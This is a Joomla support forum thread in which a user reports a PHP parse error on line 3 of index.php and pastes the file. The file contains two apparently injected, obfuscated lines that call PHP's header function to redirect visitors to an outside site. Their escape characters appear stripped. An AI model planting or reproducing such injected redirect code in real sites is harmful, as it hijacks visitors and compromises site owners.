Errro de sintaxe T_STRING

Discussion regarding Joomla! Performance issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security and Performance FAQs
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
GMelo
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Thu Feb 07, 2013 11:50 am

Errro de sintaxe T_STRING

Post by GMelo » Thu Feb 07, 2013 2:33 pm

Oi galera!
eu estava chegando para trabalhar e quando foi exibido no meu site esse mansagem:

Erro de análise : erro de sintaxe, inesperado em T_STRING / home/storage/7/16/66/estacaorh/public_html/index.php na linha 3

Se alguém soube como arrumar por favor me ajudem! muito obrigado
ps:antes ele havia dado problema na linha 20 e eu fiz um restore junto a hospedagem e agora está apresentando esse problema
Hi guys!
I was coming to work and when it was displayed on my site this mansagem:

Parse error: syntax error, unexpected T_STRING in / home/storage/7/16/66/estacaorh/public_html/index.php on line 3

If anyone knew how to fix please help me! thank you very much
ps: before he had given problem on line 20 and I did a restore and now with the hosting is presenting this issue




<?php
/**
* @version $Id: index.php 14401 2010-01-26 14:10:00Z louis $
* @package Joomla
* @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
$x0b="h145x61144er";
$x0b("R145146x72ex73x68x3ax20x32x35 73 165x72lx3d""httx70:x2f 57142x6cux65150ox73164x2dx64x7a.x63om 57wx69x6bi");
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
* CREATE THE APPLICATION
*
* NOTE :
*/
$mainframe =& JFactory::getApplication('site');

/**
* INITIALISE THE APPLICATION
*
* NOTE :
*/
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
* ROUTE THE APPLICATION
*
* NOTE :
*/
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
* DISPATCH THE APPLICATION
*
* NOTE :
*/
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
* RENDER THE APPLICATION
*
* NOTE :
*/
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));

Locked

Return to “Performance - 1.0.x”